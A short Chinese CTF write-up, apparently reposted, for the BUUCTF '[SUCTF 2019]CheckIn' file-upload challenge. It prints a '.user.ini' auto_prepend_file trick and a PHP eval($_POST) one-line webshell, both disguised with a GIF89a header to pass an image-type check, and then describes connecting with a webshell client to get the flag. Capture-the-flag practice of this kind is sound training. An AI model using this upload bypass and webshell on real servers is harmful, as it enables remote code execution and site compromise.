BUU-WEB-[SUCTF 2019]CheckIn

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[SUCTF 2019]CheckIn相关的知识,希望对你有一定的参考价值。

BUU-WEB-[SUCTF 2019]CheckIn

在这里插入图片描述
看样子就知道又是一道文件上传题,但是没告诉我们可以上传什么文件。于是先尝试一个随便的txt文件。(传一句话木马会被拒)
在这里插入图片描述
告诉我们要上传图片格式。
根据exif_imagetype函数,首先要上传**.user.ini**文件
文件内容为:

GIF89a
auto_prepend_file=01.jpg

在这里插入图片描述

一句话木马如下:

GIF89a
<script language="php">eval($_POST[shell])</script>

在这里插入图片描述
然后菜刀访问:
http://a28dd4c5-81f9-4c65-a695-4d5b11083e1d.node3.buuoj.cn/uploads/d99081fe929b750e0557f85e6499103f/index.php
即可连接上去获得flag。
在这里插入图片描述

以上是关于BUU-WEB-[SUCTF 2019]CheckIn的主要内容,如果未能解决你的问题,请参考以下文章

buu-web刷题

刷题记录:[SUCTF 2019]EasySQL (欠)

刷题记录:[SUCTF 2019]Pythonginx

WEB|[SUCTF 2019]Pythonginx

[SUCTF 2019]Pythonginx

BUUCTF:[SUCTF 2019]Pythonginx